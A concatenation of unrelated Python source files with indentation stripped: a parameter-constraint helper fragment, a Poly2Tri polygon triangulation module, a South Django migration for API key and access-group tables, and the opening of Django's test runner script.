# return self._highest_parent_.tie.label_buf[self._highest_parent_._raveled_index_for(self)].sum()>0
# return True
#
# def tie_together(self):
# self._highest_parent_.tie.add_tied_parameter(self)
# self._highest_parent_._set_fixed(self,self._raveled_index())
# self._trigger_params_changed()
#===============================================================================
def _parent_changed(self, parent):
"""
From Parentable:
Called when the parent changed
update the constraints and priors view, so that
constraining is automized for the parent.
"""
from .index_operations import ParameterIndexOperationsView
#if getattr(self, "_in_init_"):
#import ipdb;ipdb.set_trace()
#self.constraints.update(param.constraints, start)
#self.priors.update(param.priors, start)
offset = parent._offset_for(self)
for name, iop in list(self._index_operations.items()):
self.remove_index_operation(name)
self.add_index_operation(name, ParameterIndexOperationsView(parent._index_operations[name], offset, self.size))
self._fixes_ = None
for p in self.parameters:
p._parent_changed(parent)
def _add_to_index_operations(self, which, reconstrained, what, warning):
"""
Helper preventing copy code.
This adds the given what (transformation, prior etc) to parameter index operations which.
reconstrained are reconstrained indices.
warn when reconstraining parameters if warning is True.
TODO: find out which parameters have changed specifically
"""
if warning and reconstrained.size > 0:
# TODO: figure out which parameters have changed and only print those
print("WARNING: reconstraining parameters {}".format(self.hierarchy_name() or self.name))
index = self._raveled_index()
which.add(what, index)
return index
def _remove_from_index_operations(self, which, transforms):
"""
Helper preventing copy code.
Remove given what (transform prior etc) from which param index ops.
"""
if len(transforms) == 0:
transforms = which.properties()
removed = np.empty((0,), dtype=int)
for t in list(transforms):
unconstrained = which.remove(t, self._raveled_index())
removed = np.union1d(removed, unconstrained)
if t is __fixed__:
self._highest_parent_._set_unfixed(self, unconstrained)
return removed
def __setstate__(self, state):
self._index_operations = OrderedDict()
super(Indexable, self).__setstate__(state)
|
|
#
# Poly2Tri
# Copyright (c) 2009, Mason Green
# http://code.google.com/p/poly2tri/
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# self list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# self list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# Neither the name of Poly2Tri nor the names of its contributors may be
# used to endorse or promote products derived from self software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from random import shuffle
from math import atan2
##
## Based on Raimund Seidel'e paper "A simple and fast incremental randomized
## algorithm for computing trapezoidal decompositions and for triangulating polygons"
## (Ported from poly2tri)
##
# Shear transform. May effect numerical robustness
SHEAR = 1e-3
class Point(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.next, self.prev = None, None
def __str__(self):
return "Point( %s , %s )" %(self.x,self.y)
def __sub__(self, other):
if isinstance(other, Point):
return Point(self.x - other.x, self.y - other.y)
else:
return Point(self.x - other, self.y - other)
def __add__(self, other):
if isinstance(other, Point):
return Point(self.x + other.x, self.y + other.y)
else:
return Point(self.x + other, self.y + other)
def __mul__(self, f):
return Point(self.x * f, self.y * f)
def __div__(self, a):
return Point(self.x / a, self.y / a)
def cross(self, p):
return self.x * p.y - self.y * p.x
def dot(self, p):
return self.x * p.x + self.y * p.y
def length(self):
return sqrt(self.x * self.x + self.y * self.y)
def normalize(self):
return self / self.length()
def less(self, p):
return self.x < p.x
def neq(self, other):
return other.x != self.x or other.y != self.y
def clone(self):
return Point(self.x, self.y)
def orient2d(pa, pb, pc):
acx = pa.x - pc.x;
bcx = pb.x - pc.x;
acy = pa.y - pc.y;
bcy = pb.y - pc.y;
return acx * bcy - acy * bcx;
class Edge(object):
def __init__(self, p, q):
self.p = p
self.q = q
self.slope = (q.y - p.y) / (q.x - p.x) if q.x - p.x != 0 else 0
self.b = p.y - (p.x * self.slope)
self.above, self.below = None, None
self.mpoints = [p, q]
def __str__(self):
return "Edge( %s , %s )" %(self.p,self.q)
def is_above(self, point):
return orient2d(self.p, self.q, point) < 0
def is_below(self, point):
return orient2d(self.p, self.q, point) > 0
def add_mpoint(self, point):
for mp in self.mpoints:
if not mp.neq(point): return
self.mpoints.append(point)
class Trapezoid(object):
def __init__(self, left_point, right_point, top, bottom):
self.left_point = left_point
self.right_point = right_point
self.top = top
self.bottom = bottom
self.upper_left = None
self.upper_right = None
self.lower_left = None
self.lower_right = None
self.inside = True
self.sink = None
self.key = hash(self)
def update_left(self, ul, ll):
self.upper_left = ul
if ul != None: ul.upper_right = self
self.lower_left = ll
if ll != None: ll.lower_right = self
def update_right(self, ur, lr):
self.upper_right = ur
if ur != None: ur.upper_left = self
self.lower_right = lr
if lr != None: lr.lower_left = self
def update_left_right(self, ul, ll, ur, lr):
self.upper_left = ul
if ul != None: ul.upper_right = self
self.lower_left = ll
if ll != None: ll.lower_right = self
self.upper_right = ur
if ur != None: ur.upper_left = self
self.lower_right = lr
if lr != None: lr.lower_left = self
def trim_neighbors(self):
if self.inside:
self.inside = False
if self.upper_left != None: self.upper_left.trim_neighbors()
if self.lower_left != None: self.lower_left.trim_neighbors()
if self.upper_right != None: self.upper_right.trim_neighbors()
if self.lower_right != None: self.lower_right.trim_neighbors()
def contains(self, point):
return (point.x > self.left_point.x and point.x < self.right_point.x and
self.top.is_above(point) and self.bottom.is_below(point))
def vertices(self):
v1 = line_intersect(self.top, self.left_point.x)
v2 = line_intersect(self.bottom, self.left_point.x)
v3 = line_intersect(self.bottom, self.right_point.x)
v4 = line_intersect(self.top, self.right_point.x)
return v1, v2, v3, v4
def add_points(self):
if self.left_point is not self.bottom.p:
self.bottom.add_mpoint(self.left_point)
if self.right_point is not self.bottom.q:
self.bottom.add_mpoint(self.right_point)
if self.left_point is not self.top.p:
self.top.add_mpoint(self.left_point)
if self.right_point is not self.top.q:
self.top.add_mpoint(self.right_point)
def area(self):
p = list(self.vertices())
x0 = p[0][0]; y0 = p[0][1]
x1 = p[1][0]; y1 = p[1][1]
return 0.5 * abs(sum(x0*y1 - x1*y0
for ((x0, y0), (x1, y1)) in self.segments(p)))
def segments(self, p):
return zip(p, p[1:] + [p[0]])
def line_intersect(edge, x):
y = edge.slope * x + edge.b
return x, y
class Triangulator(object):
##
## Number of points should be > 3
##
def __init__(self, poly_line):
self.polygons = []
self.trapezoids = []
self.xmono_poly = []
self.edge_list = self.init_edges(poly_line)
self.trapezoidal_map = TrapezoidalMap()
self.bounding_box = self.trapezoidal_map.bounding_box(self.edge_list)
self.query_graph = QueryGraph(isink(self.bounding_box))
self.process()
def triangles(self):
triangles = []
for p in self.polygons:
verts = []
for v in p:
verts.append((v.x, v.y))
triangles.append(verts)
return triangles
def trapezoid_map(self):
return self.trapezoidal_map.map
# Build the trapezoidal map and query graph
def process(self):
for edge in self.edge_list:
traps = self.query_graph.follow_edge(edge)
for t in traps:
# Remove old trapezods
del self.trapezoidal_map.map[t.key]
# Bisect old trapezoids and create new
cp = t.contains(edge.p)
cq = t.contains(edge.q)
if cp and cq:
tlist = self.trapezoidal_map.case1(t, edge)
self.query_graph.case1(t.sink, edge, tlist)
elif cp and not cq:
tlist = self.trapezoidal_map.case2(t, edge)
self.query_graph.case2(t.sink, edge, tlist)
elif not cp and not cq:
tlist = self.trapezoidal_map.case3(t, edge)
self.query_graph.case3(t.sink, edge, tlist)
else:
tlist = self.trapezoidal_map.case4(t, edge)
self.query_graph.case4(t.sink, edge, tlist)
# Add new trapezoids to map
for t in tlist:
self.trapezoidal_map.map[t.key] = t
self.trapezoidal_map.clear()
# Mark outside trapezoids w/ depth-first search
for k, t in self.trapezoidal_map.map.items():
self.mark_outside(t)
# Collect interior trapezoids
for k, t in self.trapezoidal_map.map.items():
if t.inside:
self.trapezoids.append(t)
t.add_points()
# Generate the triangles
self.create_mountains()
def mono_polies(self):
polies = []
for x in self.xmono_poly:
polies.append(x.monoPoly)
return polies
def create_mountains(self):
for edge in self.edge_list:
if len(edge.mpoints) > 2:
mountain = MonotoneMountain()
points = merge_sort(edge.mpoints)
for p in points:
mountain.add(p)
mountain.process()
for t in mountain.triangles:
self.polygons.append(t)
self.xmono_poly.append(mountain)
def mark_outside(self, t):
if t.top is self.bounding_box.top or t.bottom is self.bounding_box.bottom:
t.trim_neighbors()
def init_edges(self, points):
edge_list = []
size = len(points)
for i in range(size):
j = i + 1 if i < size-1 else 0
p = points[i][0], points[i][1]
q = points[j][0], points[j][1]
edge_list.append((p, q))
return self.order_edges(edge_list)
def order_edges(self, edge_list):
edges = []
for e in edge_list:
p = shear_transform(e[0])
q = shear_transform(e[1])
if p.x > q.x:
edges.append(Edge(q, p))
else:
edges.append(Edge(p, q))
# Randomized incremental algorithm
shuffle(edges)
return edges
def shear_transform(point):
return Point(point[0] + SHEAR * point[1], point[1])
def merge_sort(l):
if len(l)>1 :
lleft = merge_sort(l[:len(l)/2])
lright = merge_sort(l[len(l)/2:])
p1, p2, p = 0, 0, 0
while p1<len(lleft) and p2<len(lright):
if lleft[p1].x < lright[p2].x:
l[p]=lleft[p1]
p+=1
p1+=1
else:
l[p]=lright[p2]
p+=1
p2+=1
if p1<len(lleft):l[p:]=lleft[p1:]
elif p2<len(lright):l[p:]=lright[p2:]
else : print "internal error"
return l
class TrapezoidalMap(object):
def __init__(self):
self.map = {}
self.margin = 50.0
self.bcross = None
self.tcross = None
def clear(self):
self.bcross = None
self.tcross = None
def case1(self, t, e):
trapezoids = []
trapezoids.append(Trapezoid(t.left_point, e.p, t.top, t.bottom))
trapezoids.append(Trapezoid(e.p, e.q, t.top, e))
trapezoids.append(Trapezoid(e.p, e.q, e, t.bottom))
trapezoids.append(Trapezoid(e.q, t.right_point, t.top, t.bottom))
trapezoids[0].update_left(t.upper_left, t.lower_left)
trapezoids[1].update_left_right(trapezoids[0], None, trapezoids[3], None)
trapezoids[2].update_left_right(None, trapezoids[0], None, trapezoids[3])
trapezoids[3].update_right(t.upper_right, t.lower_right)
return trapezoids
def case2(self, t, e):
rp = e.q if e.q.x == t.right_point.x else t.right_point
trapezoids = []
trapezoids.append(Trapezoid(t.left_point, e.p, t.top, t.bottom))
trapezoids.append(Trapezoid(e.p, rp, t.top, e))
trapezoids.append(Trapezoid(e.p, rp, e, t.bottom))
trapezoids[0].update_left(t.upper_left, t.lower_left)
trapezoids[1].update_left_right(trapezoids[0], None, t.upper_right, None)
trapezoids[2].update_left_right(None, trapezoids[0], None, t.lower_right)
self.bcross = t.bottom
self.tcross = t.top
e.above = trapezoids[1]
e.below = trapezoids[2]
return trapezoids
def case3(self, t, e):
lp = e.p if e.p.x == t.left_point.x else t.left_point
rp = e.q if e.q.x == t.right_point.x else t.right_point
trapezoids = []
if self.tcross is t.top:
trapezoids.append(t.upper_left)
trapezoids[0].update_right(t.upper_right, None)
trapezoids[0].right_point = rp
else:
trapezoids.append(Trapezoid(lp, rp, t.top, e))
trapezoids[0].update_left_right(t.upper_left, e.above, t.upper_right, None)
if self.bcross is t.bottom:
trapezoids.append(t.lower_left)
trapezoids[1].update_right(None, t.lower_right)
trapezoids[1].right_point = rp
else:
trapezoids.append(Trapezoid(lp, rp, e, t.bottom))
trapezoids[1].update_left_right(e.below, t.lower_left, None, t.lower_right)
self.bcross = t.bottom
self.tcross = t.top
e.above = trapezoids[0]
e.below = trapezoids[1]
return trapezoids
def case4(self, t, e):
lp = e.p if e.p.x == t.left_point.x else t.left_point
trapezoids = []
if self.tcross is t.top:
trapezoids.append(t.upper_left)
trapezoids[0].right_point = e.q
else:
trapezoids.append(Trapezoid(lp, e.q, t.top, e))
trapezoids[0].update_left(t.upper_left, e.above)
if self.bcross is t.bottom:
trapezoids.append(t.lower_left)
trapezoids[1].right_point = e.q
else:
trapezoids.append(Trapezoid(lp, e.q, e, t.bottom))
trapezoids[1].update_left(e.below, t.lower_left)
trapezoids.append(Trapezoid(e.q, t.right_point, t.top, t.bottom))
trapezoids[2].update_left_right(trapezoids[0], trapezoids[1], t.upper_right, t.lower_right)
return trapezoids
def bounding_box(self, edges):
margin = self.margin
max = edges[0].p + margin
min = edges[0].q - margin
for e in edges:
if e.p.x > max.x: max = Point(e.p.x + margin, max.y)
if e.p.y > max.y: max = Point(max.x, e.p.y + margin)
if e.q.x > max.x: max = Point(e.q.x + margin, max.y)
if e.q.y > max.y: max = Point(max.x, e.q.y + margin)
if e.p.x < min.x: min = Point(e.p.x - margin, min.y)
if e.p.y < min.y: min = Point(min.x, e.p.y - margin)
if e.q.x < min.x: min = Point(e.q.x - margin, min.y)
if e.q.y < min.y: min = Point(min.x, e.q.y - margin)
top = Edge(Point(min.x, max.y), Point(max.x, max.y))
bottom = Edge(Point(min.x, min.y), Point(max.x, min.y))
left = top.p
right = top.q
trap = Trapezoid(left, right, top, bottom)
self.map[trap.key] = trap
return trap
class Node(object):
def __init__(self, lchild, rchild):
self.parent_list = []
self.lchild = lchild
self.rchild = rchild
if lchild != None:
lchild.parent_list.append(self)
if rchild != None:
rchild.parent_list.append(self)
def replace(self, node):
for parent in node.parent_list:
if parent.lchild is node:
parent.lchild = self
else:
parent.rchild = self
self.parent_list += node.parent_list
class Sink(Node):
def __init__(self, trapezoid):
super(Sink, self).__init__(None, None)
self.trapezoid = trapezoid
trapezoid.sink = self
def locate(self, edge):
return self
def isink(trapezoid):
if trapezoid.sink is None:
return Sink(trapezoid)
return trapezoid.sink
class XNode(Node):
def __init__(self, point, lchild, rchild):
super(XNode, self).__init__(lchild, rchild)
self.point = point
def locate(self, edge):
if edge.p.x >= self.point.x:
return self.rchild.locate(edge)
return self.lchild.locate(edge)
class YNode(Node):
def __init__(self, edge, lchild, rchild):
super(YNode, self).__init__(lchild, rchild)
self.edge = edge
def locate(self, edge):
if self.edge.is_above(edge.p):
return self.rchild.locate(edge)
if self.edge.is_below(edge.p):
return self.lchild.locate(edge)
if edge.slope < self.edge.slope:
return self.rchild.locate(edge)
return self.lchild.locate(edge)
class QueryGraph:
def __init__(self, head):
self.head = head
def locate(self, edge):
return self.head.locate(edge).trapezoid
def follow_edge(self, edge):
trapezoids = [self.locate(edge)]
while(edge.q.x > trapezoids[-1].right_point.x):
if edge.is_above(trapezoids[-1].right_point):
trapezoids.append(trapezoids[-1].upper_right)
else:
trapezoids.append(trapezoids[-1].lower_right)
return trapezoids
def replace(self, sink, node):
if sink.parent_list:
node.replace(sink)
else:
self.head = node
def case1(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[1]), isink(tlist[2]))
qNode = XNode(edge.q, yNode, isink(tlist[3]))
pNode = XNode(edge.p, isink(tlist[0]), qNode)
self.replace(sink, pNode)
def case2(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[1]), isink(tlist[2]))
pNode = XNode(edge.p, isink(tlist[0]), yNode)
self.replace(sink, pNode)
def case3(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[0]), isink(tlist[1]))
self.replace(sink, yNode)
def case4(self, sink, edge, tlist):
yNode = YNode(edge, isink(tlist[0]), isink(tlist[1]))
qNode = XNode(edge.q, yNode, isink(tlist[2]))
self.replace(sink, qNode)
PI_SLOP = 3.1
class MonotoneMountain:
def __init__(self):
self.size = 0
self.tail = None
self.head = None
self.positive = False
self.convex_points = set()
self.mono_poly = []
self.triangles = []
self.convex_polies = []
def add(self, point):
if self.size is 0:
self.head = point
self.size = 1
elif self.size is 1:
self.tail = point
self.tail.prev = self.head
self.head.next = self.tail
self.size = 2
else:
self.tail.next = point
point.prev = self.tail
self.tail = point
self.size += 1
def remove(self, point):
next = point.next
prev = point.prev
point.prev.next = next
point.next.prev = prev
self.size -= 1
def process(self):
self.positive = self.angle_sign()
self.gen_mono_poly()
p = self.head.next
while p.neq(self.tail):
a = self.angle(p)
if a >= PI_SLOP or a <= -PI_SLOP or a == 0:
self.remove(p)
elif self.is_convex(p):
self.convex_points.add(p)
p = p.next
self.triangulate()
def triangulate(self):
while self.convex_points:
ear = self.convex_points.pop()
a = ear.prev
b = ear
c = ear.next
triangle = (a, b, c)
self.triangles.append(triangle)
self.remove(ear)
if self.valid(a):
self.convex_points.add(a)
if self.valid(c):
self.convex_points.add(c)
#assert self.size <= 3, "Triangulation bug, please report"
def valid(self, p):
return p.neq(self.head) and p.neq(self.tail) and self.is_convex(p)
def gen_mono_poly(self):
p = self.head
while(p != None):
self.mono_poly.append(p)
p = p.next
def angle(self, p):
a = p.next - p
b = p.prev - p
return atan2(a.cross(b), a.dot(b))
def angle_sign(self):
a = self.head.next - self.head
b = self.tail - self.head
return atan2(a.cross(b), a.dot(b)) >= 0
def is_convex(self, p):
if self.positive != (self.angle(p) >= 0):
return False
return True
|
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'APICachedDocument'
db.delete_table('API_apicacheddocument')
# Adding model 'APIAccessGroup'
db.create_table('API_apiaccessgroup', (
('group_id', self.gf('django.db.models.fields.IntegerField')(primary_key=True)),
('group_name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('group_description', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
))
db.send_create_signal('API', ['APIAccessGroup'])
# Adding model 'APIAccessType'
db.create_table('API_apiaccesstype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('call_type', self.gf('django.db.models.fields.IntegerField')()),
('call_name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('call_description', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('call_group', self.gf('django.db.models.fields.related.ForeignKey')(related_name='calls', to=orm['API.APIAccessGroup'])),
('call_mask', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal('API', ['APIAccessType'])
# Adding model 'APIAccessRequirement'
db.create_table('API_apiaccessrequirement', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('requirement', self.gf('django.db.models.fields.related.ForeignKey')(related_name='required_by', to=orm['API.APIAccessType'])),
))
db.send_create_signal('API', ['APIAccessRequirement'])
# Adding M2M table for field corps_required on 'APIAccessRequirement'
db.create_table('API_apiaccessrequirement_corps_required', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('apiaccessrequirement', models.ForeignKey(orm['API.apiaccessrequirement'], null=False)),
('corporation', models.ForeignKey(orm['core.corporation'], null=False))
))
db.create_unique('API_apiaccessrequirement_corps_required', ['apiaccessrequirement_id', 'corporation_id'])
# Adding M2M table for field groups_required on 'APIAccessRequirement'
db.create_table('API_apiaccessrequirement_groups_required', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('apiaccessrequirement', models.ForeignKey(orm['API.apiaccessrequirement'], null=False)),
('group', models.ForeignKey(orm['auth.group'], null=False))
))
db.create_unique('API_apiaccessrequirement_groups_required', ['apiaccessrequirement_id', 'group_id'])
# Adding field 'CorpAPIKey.character_name'
db.add_column('API_corpapikey', 'character_name',
self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
keep_default=False)
# Adding field 'APIKey.access_mask'
db.add_column('API_apikey', 'access_mask',
self.gf('django.db.models.fields.IntegerField')(default=0),
keep_default=False)
# Adding field 'APIKey.validation_error'
db.add_column('API_apikey', 'validation_error',
self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Adding model 'APICachedDocument'
db.create_table('API_apicacheddocument', (
('xml', self.gf('django.db.models.fields.TextField')()),
('cacheduntil', self.gf('django.db.models.fields.DateTimeField')()),
('host', self.gf('django.db.models.fields.CharField')(max_length=100)),
('params', self.gf('django.db.models.fields.CharField')(max_length=200)),
('path', self.gf('django.db.models.fields.CharField')(max_length=100)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('API', ['APICachedDocument'])
# Deleting model 'APIAccessGroup'
db.delete_table('API_apiaccessgroup')
# Deleting model 'APIAccessType'
db.delete_table('API_apiaccesstype')
# Deleting model 'APIAccessRequirement'
db.delete_table('API_apiaccessrequirement')
# Removing M2M table for field corps_required on 'APIAccessRequirement'
db.delete_table('API_apiaccessrequirement_corps_required')
# Removing M2M table for field groups_required on 'APIAccessRequirement'
db.delete_table('API_apiaccessrequirement_groups_required')
# Deleting field 'CorpAPIKey.character_name'
db.delete_column('API_corpapikey', 'character_name')
# Deleting field 'APIKey.access_mask'
db.delete_column('API_apikey', 'access_mask')
# Deleting field 'APIKey.validation_error'
db.delete_column('API_apikey', 'validation_error')
models = {
'API.apiaccessgroup': {
'Meta': {'object_name': 'APIAccessGroup'},
'group_description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'group_id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'group_name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'API.apiaccessrequirement': {
'Meta': {'object_name': 'APIAccessRequirement'},
'corps_required': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'api_requirements'", 'null': 'True', 'to': "orm['core.Corporation']"}),
'groups_required': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'api_requirements'", 'null': 'True', 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'requirement': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'required_by'", 'to': "orm['API.APIAccessType']"})
},
'API.apiaccesstype': {
'Meta': {'object_name': 'APIAccessType'},
'call_description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'call_group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'calls'", 'to': "orm['API.APIAccessGroup']"}),
'call_mask': ('django.db.models.fields.IntegerField', [], {}),
'call_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'call_type': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'API.apicharacter': {
'Meta': {'object_name': 'APICharacter'},
'alliance': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'apikey': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'characters'", 'to': "orm['API.APIKey']"}),
'charid': ('django.db.models.fields.BigIntegerField', [], {}),
'corp': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lastshipname': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'lastshiptype': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'visible': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'API.apikey': {
'Meta': {'object_name': 'APIKey'},
'access_mask': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyid': ('django.db.models.fields.IntegerField', [], {}),
'lastvalidated': ('django.db.models.fields.DateTimeField', [], {}),
'proxykey': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'validation_error': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'vcode': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'API.apishiplog': {
'Meta': {'object_name': 'APIShipLog'},
'character': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shiplogs'", 'to': "orm['API.APICharacter']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shipname': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shiptype': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {})
},
'API.corpapikey': {
'Meta': {'object_name': 'CorpAPIKey', '_ormbases': ['API.APIKey']},
'apikey_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['API.APIKey']", 'unique': 'True', 'primary_key': 'True'}),
'character_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'corp': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'api_keys'", 'to': "orm['core.Corporation']"})
},
'API.memberapikey': {
'Meta': {'object_name': 'MemberAPIKey', '_ormbases': ['API.APIKey']},
'apikey_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['API.APIKey']", 'unique': 'True', 'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'api_keys'", 'to': "orm['auth.User']"})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.alliance': {
'Meta': {'object_name': 'Alliance'},
'executor': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['core.Corporation']"}),
'id': ('django.db.models.fields.BigIntegerField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'shortname': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.corporation': {
'Meta': {'object_name': 'Corporation'},
'alliance': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'member_corps'", 'null': 'True', 'to': "orm['core.Alliance']"}),
'id': ('django.db.models.fields.BigIntegerField', [], {'primary_key': 'True'}),
'member_count': ('django.db.models.fields.IntegerField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'ticker': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['API']
|
|
#!/usr/bin/env python
from __future__ import division
import os, sys
base_path = os.path.dirname(os.path.dirname(__file__))
if not base_path in sys.path[:1]:
sys.path.insert(0, base_path)
import logging
import os
import shutil
import subprocess
import sys
import tempfile
import warnings
import django
from django import contrib
from django.utils.deprecation import RemovedInDjango18Warning, RemovedInDjango19Warning
from django.utils._os import upath
from django.utils import six
warnings.simplefilter("default", RemovedInDjango19Warning)
warnings.simplefilter("default", RemovedInDjango18Warning)
CONTRIB_MODULE_PATH = 'django.contrib'
TEST_TEMPLATE_DIR = 'templates'
CONTRIB_DIR = os.path.dirname(upath(contrib.__file__))
RUNTESTS_DIR = os.path.abspath(os.path.dirname(upath(__file__)))
TEMP_DIR = tempfile.mkdtemp(prefix='django_')
os.environ['DJANGO_TEST_TEMP_DIR'] = TEMP_DIR
SUBDIRS_TO_SKIP = [
'data',
'test_discovery_sample',
'test_discovery_sample2',
'test_runner_deprecation_app',
